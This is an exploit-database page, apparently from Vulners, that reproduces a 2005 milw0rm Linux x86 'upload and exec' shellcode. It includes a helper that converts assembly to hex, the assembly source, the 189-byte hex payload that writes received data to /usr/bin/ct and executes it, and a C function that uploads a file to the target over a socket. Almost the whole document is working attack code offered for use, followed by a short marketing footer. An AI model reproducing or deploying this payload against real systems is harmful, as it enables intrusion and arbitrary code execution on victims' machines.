Vulners
Lucene search
linux/x86 upload & exec 189 bytes
UPLOAD & EXEC SHELLCODE
[1] converting asm to hex
[2] asm code
[3] hex output
[4] upload function
This is an 'upload and exec' shellcode for the x86 platform.
File has to be in executable format,
cool if you know the distribution of the target, otherwise
it is useless.
-cybertronic
[1]
/*
* convert .s to shellcode typo/teso ([email protected])
*
* $ cat asm.s
* .globl cbegin
* .globl cend
* cbegin:
* "asm goes here"
* cend:
* $ gcc -Wall asm.s asm2hex.c -o out
* $ ./out
*
*/
#include
extern void cbegin();
extern void cend();
int
main ()
{
int i = 0;
int x = 0;
char* buf = ( char* ) cbegin;
printf ( "unsigned char shellcode[] =\n\"" );
for ( ; ( *buf ) && ( buf < ( char* ) cend ); buf++ )
{
if ( i++ == 16 )
i = 1;
if ( i == 1 && x != 0 )
printf ( "\"\n\"" );
x = 1;
printf ( "\\x%02x", ( unsigned char )* buf );
}
printf ( "\";\n" );
return ( 0 );
}
[2]
# append to any bind shellcode
# gcc -Wall upload-exec.s asm2hex.c -o upload-exec
# cybertronic
.globl cbegin
.globl cend
cbegin:
movl %eax,%ecx
jmp getstr
start:
popl %esi
leal (%esi),%ebx
xorl %eax,%eax
movb %al,0x0b(%esi)
pushl %esi
pushl %ecx
movb $0x05,%al
movw $0x241,%cx
movw $00777,%dx
int $0x80
movl %eax,%edi
popl %esi
read:
movl %esi,%ebx
movb $0x03,%al
leal -200(%esp),%ecx
movb $0x01,%dl
int $0x80
cmpl $0xffffffff,%eax
je end
xorl %ecx,%ecx
cmpl %eax,%ecx
je continue
leal -200(%esp),%ecx
xorl %ebx,%ebx
movl %edi,%ebx
movl %eax,%edx
movb $0x04,%al
int $0x80
jmp read
continue:
movb $0x06,%al
movl %esi,%ebx
int $0x80
movb $0x06,%al
xorl %ebx,%ebx
movl %edi,%ebx
int $0x80
xorl %esi, %esi
popl %esi
movl %esi,0x0c(%esi)
xorl %eax,%eax
movl %eax,0x10(%esi)
movb $0x0b,%al
xchgl %esi,%ebx
leal 0x0c(%ebx),%ecx
leal 0x10(%ebx),%edx
int $0x80
end:
xorl %eax,%eax
incl %eax
int $0x80
getstr:
call start
.string "/usr/bin/ct"
cend:
[3]
/*
* linux x86
* 189 bytes upload & exec shellcode by cybertronic
* cybertronic[at]gmx[dot]net
*
*/
unsigned char shellcode[] =
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80"
"\x89\xc7\x52\x66\x68\xc7\xc7\x43\x66\x53\x89\xe1\xb0\xef\xf6\xd0"
"\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\x43\x43\xcd\x80\x50"
"\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xc1\xeb\x70\x5e\x8d\x1e"
"\x31\xc0\x88\x46\x0b\x56\x51\xb0\x05\x66\xb9\x41\x02\x66\xba\xff"
"\x01\xcd\x80\x89\xc7\x5e\x89\xf3\xb0\x03\x8d\x8c\x24\x38\xff\xff"
"\xff\xb2\x01\xcd\x80\x83\xf8\xff\x74\x3e\x31\xc9\x39\xc1\x74\x13"
"\x8d\x8c\x24\x38\xff\xff\xff\x31\xdb\x89\xfb\x89\xc2\xb0\x04\xcd"
"\x80\xeb\xd3\xb0\x06\x89\xf3\xcd\x80\xb0\x06\x31\xdb\x89\xfb\xcd"
"\x80\x31\xf6\x5e\x89\x76\x0c\x31\xc0\x89\x46\x10\xb0\x0b\x87\xf3"
"\x8d\x4b\x0c\x8d\x53\x10\xcd\x80\x31\xc0\x40\xcd\x80\xe8\x8b\xff"
"\xff\xff\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x63\x74";
[4]
int
upload ( char* ip )
{
int s;
int fd;
char ch;
struct stat st;
s = conn ( ip );
if ( ( fd = open ( "file", O_RDONLY ) ) == -1 )
return ( 1 );
fstat ( fd, &st );
while ( st.st_size-- > 0 )
{
if ( read ( fd, &ch, 1 ) < 0 )
return ( 1 );
if ( write ( s, &ch, 1 ) < 0 )
return ( 1 );
}
close ( fd );
close ( s );
return ( 0 );
}
# milw0rm.com [2005-06-19]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Jun 2005 00:00Current
7.1High risk
Vulners AI Score7.1